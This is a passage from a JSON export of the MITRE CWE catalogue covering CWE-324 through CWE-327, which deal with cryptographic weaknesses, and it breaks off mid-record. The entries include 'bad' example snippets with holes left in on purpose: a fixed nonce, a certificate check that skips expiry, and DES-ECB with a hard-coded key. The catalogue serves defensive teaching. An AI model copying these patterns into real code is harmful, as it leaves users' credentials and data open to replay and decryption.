network:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void encryptAndSendPassword(char *password){}","xhtml:div":{"#text":"char *nonce = \\"bad\\";...char *data = (unsigned char*)malloc(20);int para_size = strlen(nonce) + strlen(password);char *paragraph = (char*)malloc(para_size);SHA1((const unsigned char*)paragraph,parsize,(unsigned char*)data);sendEncryptedData(data)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}},"Body_Text":"Because the nonce used is always the same, an attacker can impersonate a trusted party by intercepting and resending the encrypted password. This attack avoids the need to learn the unencrypted password."},{"Intro_Text":"This code sends a command to a remote server, using an encrypted password and nonce to prove the command is from a trusted party:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String command = new String(\\"some command to execute\\");MessageDigest nonce = MessageDigest.getInstance(\\"SHA\\");nonce.update(String.valueOf(\\"bad nonce\\"));byte[] nonce = nonce.digest();MessageDigest password = MessageDigest.getInstance(\\"SHA\\");password.update(nonce + \\"secretPassword\\");byte[] digest = password.digest();sendCommand(digest, command)","xhtml:br":["","","","","","",""]}},"Body_Text":"Once again the nonce used is always the same. An attacker may be able to replay previous legitimate commands or execute new arbitrary commands."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reusing a nonce, key pair in encryption"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"324":{"attr":{"@_ID":"324","@_Name":"Use of a Key Past its Expiration Date","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.","Extended_Description":"While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged periods of time have a decreasing probability of integrity. For this reason, it is important to replace keys within a period of time proportional to their strength.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"298","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"The cryptographic key in question may be compromised, providing a malicious user with a method for authenticating as the victim."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Adequate consideration should be put in to the user interface in order to notify users previous to the key\'s expiration, to explain the importance of new key generation and to walk users through the process as painlessly as possible."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to verify that a certificate is valid.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERRCERT_NOT_YET_VALID==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"The code checks if the certificate is not yet valid, but it fails to check if a certificate is past its expiration date, thus treating expired certificates as valid."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using a key past its expiration date"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Using a Key Past its Expiration Date","attr":{"@_Date":"2008-04-11"}}}},"325":{"attr":{"@_ID":"325","@_Name":"Missing Cryptographic Step","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"358","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Developers sometimes omit \\"expensive\\" (resource-intensive) steps in order to improve performance, especially in devices with limited memory or slower CPUs. This step may be taken under a mistaken impression that the step is unnecessary for the cryptographic algorithm."},{"Phase":"Architecture and Design"},{"Phase":"Requirements","Note":"This issue may happen when the requirements for the cryptographic algorithm are not clearly stated."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]},{"Scope":["Accountability","Non-Repudiation"],"Impact":"Hide Activities"}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2001-1585","Description":"Missing challenge-response step allows authentication bypass using public key.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1585"}},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Required Cryptographic Step"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"68"}}},"Notes":{"Note":[{"#text":"Overlaps incomplete/missing security check.","attr":{"@_Type":"Relationship"}},{"#text":"Can be resultant.","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Functional_Areas, Modes_of_Introduction, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Name"}],"Previous_Entry_Name":{"#text":"Missing Required Cryptographic Step","attr":{"@_Date":"2020-08-20"}}}},"326":{"attr":{"@_ID":"326","@_Name":"Inadequate Encryption Strength","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.","Extended_Description":"A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality"],"Impact":["Bypass Protection Mechanism","Read Application Data"],"Note":"An attacker may be able to decrypt the data using brute force attacks."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use an encryption scheme that is currently considered to be strong by experts in the field."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1546","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1546"},{"Reference":"CVE-2004-2172","Description":"Weak encryption (chosen plaintext attack)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2172"},{"Reference":"CVE-2002-1682","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1682"},{"Reference":"CVE-2002-1697","Description":"Weak encryption produces same ciphertext from the same plaintext blocks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1697"},{"Reference":"CVE-2002-1739","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1739"},{"Reference":"CVE-2005-2281","Description":"Weak encryption scheme","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2281"},{"Reference":"CVE-2002-1872","Description":"Weak encryption (XOR)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1872"},{"Reference":"CVE-2002-1910","Description":"Weak encryption (reversible algorithm).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1910"},{"Reference":"CVE-2002-1946","Description":"Weak encryption (one-to-one mapping).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1946"},{"Reference":"CVE-2002-1975","Description":"Encryption error uses fixed salt, simplifying brute force / dictionary attacks (overlaps randomness).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1975"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Weak Encryption"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"192"}},{"attr":{"@_CAPEC_ID":"20"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Cryptographic Foibles&#34; Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 21: Using the Wrong Cryptography.&#34; Page 315"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-08","Modification_Importance":"Critical","Modification_Comment":"Clarified entry to focus on algorithms that do not have major weaknesses, but may not be strong enough for some purposes."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Weak Encryption","attr":{"@_Date":"2009-07-27"}}}},"327":{"attr":{"@_ID":"327","@_Name":"Use of a Broken or Risky Cryptographic Algorithm","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information.","Extended_Description":"The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Well-known techniques may exist to break the algorithm.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"311","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["Cryptographic algorithms are the methods by which data is scrambled. There are a small number of well-understood and heavily studied algorithms that should be used by most applications. It is quite difficult to produce a secure algorithm, and even high profile algorithms by accomplished cryptographic experts have been broken.","Since the state of cryptography advances so rapidly, it is common for an algorithm to be considered \\"unsafe\\" even if it was once thought to be strong. This can happen when new attacks against the algorithm are discovered, or if computing power increases so much that the cryptographic algorithm no longer provides the amount of protection that was originally thought."]}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The confidentiality of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The integrity of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm."},{"Scope":["Accountability","Non-Repudiation"],"Impact":"Hide Activities","Note":"If the cryptographic algorithm is used to ensure the identity of the source of the data (such as digital signatures), then a broken algorithm will compromise this scheme and the source of the data cannot be proven."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Analysis","Description":"Automated methods may be useful for recognizing commonly-used libraries or features that have become obsolete.","Effectiveness":"Moderate","Effectiveness_Notes":"False negatives may occur if the tool is not aware of the cryptographic libraries in use, or if custom cryptography is being used."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Framework-based Fuzzer","Automated Monitored Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-24"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis.","For example, US government systems require FIPS 140-2 certification.","Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak.","Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267]"]}},{"attr":{"@_Mitigation_ID":"MIT-52"},"Phase":"Architecture and Design","Description":"Ensure that the design allows one cryptographic algorithm can be replaced with another in the next generation or version. Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Carefully manage and protect cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography itself is irrelevant."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Industry-standard implementations will save development time and may be more likely to avoid errors that can occur during implementation of cryptographic algorithms. Consider the ESAPI Encryption feature."]}},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"These code examples use the Data Encryption Standard (DES).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"EVP_des_ecb();"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cipher des=Cipher.getInstance(\\"DES...\\");des.initEncrypt(key2);","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function encryptPassword($password){}","xhtml:div":{"#text":"$iv_size = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_ECB);$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);$key = \\"This is a password encryption key\\";$encryptedPassword = mcrypt_encrypt(MCRYPT_DES, $key, $password, MCRYPT_MODE_ECB, $iv);return $encryptedPassword;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}],"Body_Text":"Once considered a strong algorithm, DES now regarded as insufficient for many applications. It has been replaced by Advanced Encryption Standard (AES)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-3775","Description":"Product uses \\"ROT-25\\" to obfuscate the password in the registry.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3775"},{"Reference":"CVE-2007-4150","Description":"product only uses \\"XOR\\" to obfuscate sensitive data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4150"},{"Reference":"CVE-2007-5460","Description":"product only uses \\"XOR\\" and a fixed key to obfuscate sensitive data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5460"},{"Reference":"CVE-2005-4860","Description":"Product substitutes characters with other characters in a fixed way, and also leaves certain input characters unchanged.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4860"},{"Reference":"CVE-2002-2058","Description":"Attackers can infer private IP addresses by dividing each octet by the MD5 hash of \'20\'.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058"},{"Reference":"CVE-2008-3188","Description":"Product uses DES when MD5 has been specified in the configuration, resulting in weaker-than-expected password hashes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3188"},{"Reference":"CVE-2005-2946","Description":"Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946"},{"Reference":"CVE-2007-6013","Description":"Product uses the hash of a hash for authentication, allowing attackers to gain privileges if they can obtain the original hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6013"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using a broken or risky cryptographic algorithm"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"},{"attr":{"@_Taxonomy_Name":"OMG 